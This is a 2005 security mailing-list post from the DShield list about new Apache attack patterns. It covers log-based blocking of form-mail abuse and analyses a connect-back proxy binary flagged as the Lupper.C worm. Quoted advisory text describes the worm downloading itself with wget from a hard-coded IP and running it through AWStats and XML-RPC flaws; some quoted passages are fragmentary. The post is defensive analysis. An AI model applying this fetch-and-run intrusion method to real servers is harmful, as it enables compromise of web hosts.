[Dshield] A Couple of New Apache Hack Patterns
jayjwa at atr2.ath.cx
Fri Dec 16 01:47:39 GMT 2005
On Wed, 14 Dec 2005, David Cary Hart wrote:
-> 1. index2.php | index.php
-> 302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"
-> HTTP/1.1" 301 562 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
-> 2. POST directly to the form mail php processing page. In other words,
-> something like contact.php is passed to, and processed by
-> ContactProc.php. The would-be spammer-hacker-miscreant is trying to
-> forward mail by eliminating the form entry page.
-> The strategy I am using these days is to SWATCH the patterns -> rewrite
-> rule to hacker.php -> firewall rule. The purpose of the interim
-> hacker.php is to provide information just in case of a false positive.
-> Hacker.php then writes a unique line to access_log which swatch
-> recognizes to trigger the firewall rule.
You didn't try the mod_security? http://www.modsecurity.org/
Wow! A new linux virus? ->
cback -> Infection: Unix/Lupper.C (exact)
The last "cback" I saw was a connect-back Perl script. This is obviously an
Hmmm, now that I look at it, it's little more than a mini connect proxy. It
takes two parameters: "%s <host> <port>\n" , forks and passes on the
connection. I'd imagine it's used by spammers to make the mail connection look
like it's coming from another computer than what it really is. It doesn't
have the same functionality as the one described here:
"Lupper.C is a worm designed to spread through web servers by exploiting two
different security vulnerabilities. This variant has been distributed as
443,364-byte I386 ELF program.
Method of Distribution
Lupper attempts to execute a simple set of four commands on a remote server:
* Change folder to /tmp
* Use Wget to download a copy of the worm named ?listen? from a particular
hard-coded IP address
* Modify its execution attributes
* Execute the downloaded copy of the worm
The worm sends the above commands by exploiting the following vulnerabilities:
* AWStats Rawlog Plugin Input Vulnerability (Bugtraq 10950)
* XML-RPC for PHP Remote Code Execution Exploit (CAN-2005-1921) (Bugtraq
Trying to exploit the AWStats vulnerability, the worm attempts to submit its
commands to the awstats.pl script at the following locations:
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its
commands to the following scripts:
Return to top
Lupper.C opens a UDP backdoor on port 27105."
This file is much smaller.
4172 cback (bytes)
%s <host> <port>
retring in 5 seconds
fork error, retyr in 5 seconds
cannot create socket, retring in 5 seconds
I got a little excited there for a second, a new linux virus would certainly
be something. I'm so jelous of Windows!
More information about the list